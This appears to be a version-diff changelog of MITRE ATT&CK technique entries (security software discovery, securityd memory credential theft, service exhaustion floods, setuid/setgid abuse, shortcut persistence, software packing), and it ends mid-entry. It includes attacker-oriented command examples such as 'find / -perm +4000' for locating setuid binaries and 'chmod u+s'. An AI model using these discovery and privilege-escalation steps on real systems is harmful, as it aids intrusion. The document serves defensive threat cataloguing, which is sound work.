x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:52:41.104000+00:002022-10-18 22:48:33.286000+00:00
external_references[1]['source_name']Cyware Social MediaSecurityTrails Google Hacking
external_references[1]['description']Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020.Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020.
external_references[1]['url']https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8ehttps://securitytrails.com/blog/google-hacking-techniques
external_references[2]['source_name']SecurityTrails Google HackingCyware Social Media
external_references[2]['description']Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020.Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020.
external_references[2]['url']https://securitytrails.com/blog/google-hacking-techniqueshttps://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
x_mitre_version1.01.1

[T1518.001] Software Discovery: Security Software Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may attempt to get a listing of security softwart1Adversaries may attempt to get a listing of security softwar
>e, configurations, defensive tools, and sensors that are ins>e, configurations, defensive tools, and sensors that are ins
>talled on a system or in a cloud environment. This may inclu>talled on a system or in a cloud environment. This may inclu
>de things such as firewall rules and anti-virus. Adversaries>de things such as firewall rules and anti-virus. Adversaries
> may use the information from [Security Software Discovery](> may use the information from [Security Software Discovery](
>https://attack.mitre.org/techniques/T1518/001) during automa>https://attack.mitre.org/techniques/T1518/001) during automa
>ted discovery to shape follow-on behaviors, including whethe>ted discovery to shape follow-on behaviors, including whethe
>r or not the adversary fully infects the target and/or attem>r or not the adversary fully infects the target and/or attem
>pts specific actions.  Example commands that can be used to >pts specific actions.  Example commands that can be used to 
>obtain security software information are [netsh](https://att>obtain security software information are [netsh](https://att
>ack.mitre.org/software/S0108), <code>reg query</code> with [>ack.mitre.org/software/S0108), <code>reg query</code> with [
>Reg](https://attack.mitre.org/software/S0075), <code>dir</co>Reg](https://attack.mitre.org/software/S0075), <code>dir</co
>de> with [cmd](https://attack.mitre.org/software/S0106), and>de> with [cmd](https://attack.mitre.org/software/S0106), and
> [Tasklist](https://attack.mitre.org/software/S0057), but ot> [Tasklist](https://attack.mitre.org/software/S0057), but ot
>her indicators of discovery behavior may be more specific to>her indicators of discovery behavior may be more specific to
> the type of software or security system the adversary is lo> the type of software or security system the adversary is lo
>oking for. It is becoming more common to see macOS malware p>oking for. It is becoming more common to see macOS malware p
>erform checks for LittleSnitch and KnockKnock software.  Adv>erform checks for LittleSnitch and KnockKnock software.  Adv
>ersaries may also utilize cloud APIs to discover the configu>ersaries may also utilize cloud APIs to discover the configu
>rations of firewall rules within an environment.(Citation: E>rations of firewall rules within an environment.(Citation: E
>xpel IO Evil in AWS)>xpel IO Evil in AWS) For example, the permitted IP ranges, p
 >orts or user accounts for the inbound/outbound rules of secu
 >rity groups, virtual firewalls established within AWS for EC
 >2 and/or VPC instances, can be revealed by the <code>Describ
 >eSecurityGroups</code> action with various request parameter
 >s. (Citation: DescribeSecurityGroups - Amazon Elastic Comput
 >e Cloud)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Isif Ibrahima, Mandiant']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesA. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
external_referencesCAPEC-581
values_changed
STIX FieldOld valueNew Value
modified2021-03-29 16:05:00.198000+00:002022-04-11 22:26:34.327000+00:00
descriptionAdversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software. Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software. Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the DescribeSecurityGroups action with various request parameters. (Citation: DescribeSecurityGroups - Amazon Elastic Compute Cloud)
external_references[1]['source_name']capecExpel IO Evil in AWS
external_references[1]['url']https://capec.mitre.org/data/definitions/581.htmlhttps://expel.io/blog/finding-evil-in-aws/
external_references[2]['source_name']Expel IO Evil in AWSDescribeSecurityGroups - Amazon Elastic Compute Cloud
external_references[2]['description']A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.Amazon Web Services, Inc. . (2022). DescribeSecurityGroups. Retrieved January 28, 2022.
external_references[2]['url']https://expel.io/blog/finding-evil-in-aws/https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/581.html', 'external_id': 'CAPEC-581'}
x_mitre_data_sourcesFirewall: Firewall Enumeration
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFirewall: Firewall Enumeration

[T1555.002] Credentials from Password Stores: Securityd Memory

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1An adversary may obtain root access (allowing them to read st1An adversary may obtain root access (allowing them to read s
>ecurityd’s memory), then they can scan through memory to fin>ecurityd’s memory), then they can scan through memory to fin
>d the correct sequence of keys in relatively few tries to de>d the correct sequence of keys in relatively few tries to de
>crypt the user’s logon keychain. This provides the adversary>crypt the user’s logon keychain. This provides the adversary
> with all the plaintext passwords for users, WiFi, mail, bro> with all the plaintext passwords for users, WiFi, mail, bro
>wsers, certificates, secure notes, etc.(Citation: OS X Keych>wsers, certificates, secure notes, etc.(Citation: OS X Keych
>ain) (Citation: OSX Keydnap malware)  In OS X prior to El Ca>ain)(Citation: OSX Keydnap malware)  In OS X prior to El Cap
>pitan, users with root access can read plaintext keychain pa>itan, users with root access can read plaintext keychain pas
>sswords of logged-in users because Apple’s keychain implemen>swords of logged-in users because Apple’s keychain implement
>tation allows these credentials to be cached so that users a>ation allows these credentials to be cached so that users ar
>re not repeatedly prompted for passwords. (Citation: OS X Ke>e not repeatedly prompted for passwords.(Citation: OS X Keyc
>ychain) (Citation: External to DA, the OS X Way) Apple’s sec>hain)(Citation: External to DA, the OS X Way) Apple’s securi
>urityd utility takes the user’s logon password, encrypts it >tyd utility takes the user’s logon password, encrypts it wit
>with PBKDF2, and stores this master key in memory. Apple als>h PBKDF2, and stores this master key in memory. Apple also u
>o uses a set of keys and algorithms to encrypt the user’s pa>ses a set of keys and algorithms to encrypt the user’s passw
>ssword, but once the master key is found, an attacker need o>ord, but once the master key is found, an adversary need onl
>nly iterate over the other values to unlock the final passwo>y iterate over the other values to unlock the final password
>rd.(Citation: OS X Keychain)>.(Citation: OS X Keychain)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-02-17 13:16:53.850000+00:002022-03-08 21:43:20.609000+00:00
descriptionAn adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware) In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware) In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)
x_mitre_data_sources[0]Command: Command ExecutionProcess: Process Access
x_mitre_data_sources[1]Process: Process AccessCommand: Command Execution
x_mitre_version1.01.1

[T1499.002] Endpoint Denial of Service: Service Exhaustion Flood

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may target the different network services providt1Adversaries may target the different network services provid
>ed by systems to conduct a DoS. Adversaries often target DNS>ed by systems to conduct a denial of service (DoS). Adversar
> and web services, however others have been targeted as well>ies often target the availability of DNS and web services, h
>.(Citation: Arbor AnnualDoSreport Jan 2018) Web server softw>owever others have been targeted as well.(Citation: Arbor An
>are can be attacked through a variety of means, some of whic>nualDoSreport Jan 2018) Web server software can be attacked 
>h apply generally while others are specific to the software >through a variety of means, some of which apply generally wh
>being used to provide the service.  One example of this type>ile others are specific to the software being used to provid
> of attack is known as a simple HTTP flood, where an adversa>e the service.  One example of this type of attack is known 
>ry sends a large number of HTTP requests to a web server to >as a simple HTTP flood, where an adversary sends a large num
>overwhelm it and/or an application that runs on top of it. T>ber of HTTP requests to a web server to overwhelm it and/or 
>his flood relies on raw volume to accomplish the objective, >an application that runs on top of it. This flood relies on 
>exhausting any of the various resources required by the vict>raw volume to accomplish the objective, exhausting any of th
>im software to provide the service.(Citation: Cloudflare HTT>e various resources required by the victim software to provi
>Pflood)  Another variation, known as a SSL renegotiation att>de the service.(Citation: Cloudflare HTTPflood)  Another var
>ack, takes advantage of a protocol feature in SSL/TLS. The S>iation, known as a SSL renegotiation attack, takes advantage
>SL/TLS protocol suite includes mechanisms for the client and> of a protocol feature in SSL/TLS. The SSL/TLS protocol suit
> server to agree on an encryption algorithm to use for subse>e includes mechanisms for the client and server to agree on 
>quent secure connections. If SSL renegotiation is enabled, a>an encryption algorithm to use for subsequent secure connect
> request can be made for renegotiation of the crypto algorit>ions. If SSL renegotiation is enabled, a request can be made
>hm. In a renegotiation attack, the adversary establishes a S> for renegotiation of the crypto algorithm. In a renegotiati
>SL/TLS connection and then proceeds to make a series of rene>on attack, the adversary establishes a SSL/TLS connection an
>gotiation requests. Because the cryptographic renegotiation >d then proceeds to make a series of renegotiation requests. 
>has a meaningful cost in computation cycles, this can cause >Because the cryptographic renegotiation has a meaningful cos
>an impact to the availability of the service when done in vo>t in computation cycles, this can cause an impact to the ava
>lume.(Citation: Arbor SSLDoS April 2012)>ilability of the service when done in volume.(Citation: Arbo
 >r SSLDoS April 2012)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesASERT Team, Netscout Arbor. (2012, April 24). DDoS Attacks on SSL: Something Old, Something New. Retrieved April 22, 2019.
external_referencesCisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.
external_referencesCloudflare. (n.d.). What is an HTTP flood DDoS attack?. Retrieved April 22, 2019.
external_referencesCAPEC-488
external_referencesCAPEC-489
external_referencesCAPEC-528
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-488
external_referencesCAPEC-489
external_referencesCAPEC-528
external_referencesCloudflare. (n.d.). What is an HTTP flood DDoS attack?. Retrieved April 22, 2019.
external_referencesASERT Team, Netscout Arbor. (2012, April 24). DDoS Attacks on SSL: Something Old, Something New. Retrieved April 22, 2019.
external_referencesCisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.
values_changed
STIX FieldOld valueNew Value
modified2021-03-29 16:11:12.815000+00:002022-04-19 23:20:50.470000+00:00
descriptionAdversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood) Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood) Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)
external_references[1]['source_name']capecArbor SSLDoS April 2012
external_references[1]['url']https://capec.mitre.org/data/definitions/488.htmlhttps://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new
external_references[2]['source_name']capecCisco DoSdetectNetflow
external_references[2]['url']https://capec.mitre.org/data/definitions/489.htmlhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
external_references[3]['source_name']capecCloudflare HTTPflood
external_references[3]['url']https://capec.mitre.org/data/definitions/528.htmlhttps://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/
external_references[5]['source_name']Cloudflare HTTPfloodcapec
external_references[5]['url']https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/https://capec.mitre.org/data/definitions/488.html
external_references[6]['source_name']Arbor SSLDoS April 2012capec
external_references[6]['url']https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-newhttps://capec.mitre.org/data/definitions/489.html
external_references[7]['source_name']Cisco DoSdetectNetflowcapec
external_references[7]['url']https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdfhttps://capec.mitre.org/data/definitions/528.html
x_mitre_data_sources[2]Application Log: Application Log ContentNetwork Traffic: Network Traffic Flow
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesApplication Log: Application Log Content
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow

[T1548.001] Abuse Elevation Control Mechanism: Setuid and Setgid

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1An adversary may perform shell escapes or exploit vulnerabilt1An adversary may abuse configurations where an application h
>ities in an application with the setsuid or setgid bits to g>as the setuid or setgid bits set in order to get code runnin
>et code running in a different user’s context. On Linux or m>g in a different (and possibly more privileged) user’s conte
>acOS, when the setuid or setgid bits are set for an applicat>xt. On Linux or macOS, when the setuid or setgid bits are se
>ion, the application will run with the privileges of the own>t for an application binary, the application will run with t
>ing user or group respectively. (Citation: setuid man page).>he privileges of the owning user or group respectively.(Cita
> Normally an application is run in the current user’s contex>tion: setuid man page) Normally an application is run in the
>t, regardless of which user or group owns the application. H> current user’s context, regardless of which user or group o
>owever, there are instances where programs need to be execut>wns the application. However, there are instances where prog
>ed in an elevated context to function properly, but the user>rams need to be executed in an elevated context to function 
> running them doesn’t need the elevated privileges.  Instead>properly, but the user running them may not have the specifi
> of creating an entry in the sudoers file, which must be don>c required privileges.  Instead of creating an entry in the 
>e by root, any user can specify the setuid or setgid flag to>sudoers file, which must be done by root, any user can speci
> be set for their own applications. These bits are indicated>fy the setuid or setgid flag to be set for their own applica
> with an "s" instead of an "x" when viewing a file's attribu>tions (i.e. [Linux and Mac File and Directory Permissions Mo
>tes via <code>ls -l</code>. The <code>chmod</code> program c>dification](https://attack.mitre.org/techniques/T1222/002)).
>an set these bits with via bitmasking, <code>chmod 4777 [fil> The <code>chmod</code> command can set these bits with bitm
>e]</code> or via shorthand naming, <code>chmod u+s [file]</c>asking, <code>chmod 4777 [file]</code> or via shorthand nami
>ode>.  Adversaries can use this mechanism on their own malwa>ng, <code>chmod u+s [file]</code>. This will enable the setu
>re to make sure they're able to execute in elevated contexts>id bit. To enable the setgit bit, <code>chmod 2775</code> an
> in the future.(Citation: OSX Keydnap malware).>d <code>chmod g+s</code> can be used.  Adversaries can use t
 >his mechanism on their own malware to make sure they're able
 > to execute in elevated contexts in the future.(Citation: OS
 >X Keydnap malware) This abuse is often part of a "shell esca
 >pe" or other actions to bypass an execution environment with
 > restricted permissions.  Alternatively, adversaries may cho
 >ose to find and target vulnerable binaries with the setuid o
 >r setgid bits already enabled (i.e. [File and Directory Disc
 >overy](https://attack.mitre.org/techniques/T1083)). The setu
 >id and setguid bits are indicated with an "s" instead of an 
 >"x" when viewing a file's attributes via <code>ls -l</code>.
 > The <code>find</code> command can also be used to search fo
 >r such files. For example, <code>find / -perm +4000 2>/dev/n
 >ull</code> can be used to find files with setuid set and <co
 >de>find / -perm +2000 2>/dev/null</code> may be used for set
 >gid. Binaries that have these bits set may then be abused by
 > adversaries.(Citation: GTFOBins Suid)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-27 00:43:58.149000+00:002022-04-19 15:07:53.060000+00:00
descriptionAn adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware).An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The chmod command can set these bits with bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. This will enable the setuid bit. To enable the setgit bit, chmod 2775 and chmod g+s can be used. Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions. Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The find command can also be used to search for such files. For example, find / -perm +4000 2>/dev/null can be used to find files with setuid set and find / -perm +2000 2>/dev/null may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)
external_references[1]['source_name']setuid man pageGTFOBins Suid
external_references[1]['description']Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018.Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January 28, 2022.
external_references[1]['url']http://man7.org/linux/man-pages/man2/setuid.2.htmlhttps://gtfobins.github.io/#+suid
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'setuid man page', 'description': "Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. Retrieved September 21, 2018.", 'url': 'http://man7.org/linux/man-pages/man2/setuid.2.html'}
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesCommand: Command Execution

[T1547.009] Boot or Logon Autostart Execution: Shortcut Modification

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may create or edit shortcuts to run a program dut1Adversaries may create or modify shortcuts that can execute 
>ring system boot or user login. Shortcuts or symbolic links >a program during system boot or user login. Shortcuts or sym
>are ways of referencing other files or programs that will be>bolic links are used to reference other files or programs th
> opened or executed when the shortcut is clicked or executed>at will be opened or executed when the shortcut is clicked o
> by a system startup process.  Adversaries could use shortcu>r executed by a system startup process.  Adversaries may abu
>ts to execute their tools for persistence. They may create a>se shortcuts in the startup folder to execute their tools an
> new shortcut as a means of indirection that may use [Masque>d achieve persistence.(Citation: Shortcut for Persistence ) 
>rading](https://attack.mitre.org/techniques/T1036) to look l>Although often used as payloads in an infection chain (e.g. 
>ike a legitimate program. Adversaries could also edit the ta>[Spearphishing Attachment](https://attack.mitre.org/techniqu
>rget path or entirely replace an existing shortcut so their >es/T1566/001)), adversaries may also create a new shortcut a
>tools will be executed instead of the intended legitimate pr>s a means of indirection, while also abusing [Masquerading](
>ogram.>https://attack.mitre.org/techniques/T1036) to make the malic
 >ious shortcut appear as a legitimate program. Adversaries ca
 >n also edit the target path or entirely replace an existing 
 >shortcut so their malware will be executed instead of the in
 >tended legitimate program.  Shortcuts can also be abused to 
 >establish persistence by implementing other methods. For exa
 >mple, LNK browser extensions may be modified (e.g. [Browser 
 >Extensions](https://attack.mitre.org/techniques/T1176)) to p
 >ersistently launch malware.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesElastic. (n.d.). Shortcut File Written or Modified for Persistence. Retrieved June 1, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-132
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 21:30:24.555000+00:002022-10-19 22:29:46.175000+00:00
descriptionAdversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program. Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware.
external_references[1]['source_name']capecShortcut for Persistence
external_references[1]['url']https://capec.mitre.org/data/definitions/132.htmlhttps://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence
x_mitre_data_sources[1]File: File ModificationProcess: Process Creation
x_mitre_data_sources[2]Process: Process CreationFile: File Modification
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/132.html', 'external_id': 'CAPEC-132'}

[T1027.002] Obfuscated Files or Information: Software Packing

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may perform software packing or virtual machine t1Adversaries may perform software packing or virtual machine 
>software protection to conceal their code. Software packing >software protection to conceal their code. Software packing 
>is a method of compressing or encrypting an executable. Pack>is a method of compressing or encrypting an executable. Pack
>ing an executable changes the file signature in an attempt t>ing an executable changes the file signature in an attempt t
>o avoid signature-based detection. Most decompression techni>o avoid signature-based detection. Most decompression techni
>ques decompress the executable code in memory. Virtual machi>ques decompress the executable code in memory. Virtual machi
>ne software protection translates an executable's original c>ne software protection translates an executable's original c
>ode into a special format that only a special virtual machin>ode into a special format that only a special virtual machin
>e can run. A virtual machine is then called to run this code>e can run. A virtual machine is then called to run this code
>.(Citation: ESET FinFisher Jan 2018)   Utilities used to per>.(Citation: ESET FinFisher Jan 2018)   Utilities used to per
>form software packing are called packers. Example packers ar>form software packing are called packers. Example packers ar
>e MPRESS and UPX. A more comprehensive list of known packers>e MPRESS and UPX. A more comprehensive list of known packers
> is available, (Citation: Wikipedia Exe Compressionbut adv> is available, but adversaries may create their own packing 
>ersaries may create their own packing techniques that do not>techniques that do not leave the same artifacts as well-know
> leave the same artifacts as well-known packers to evade def>n packers to evade defenses.(Citation: Awesome Executable Pa
>enses.  >cking 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAlexandre D'Hondt. (n.d.). Awesome Executable Packing. Retrieved March 11, 2022.
external_referencesCAPEC-570
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-570
external_referencesExecutable compression. (n.d.). Retrieved December 4, 2014.
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 13:56:47.154000+00:002022-04-19 02:09:27.046000+00:00
descriptionAdversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses. Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A 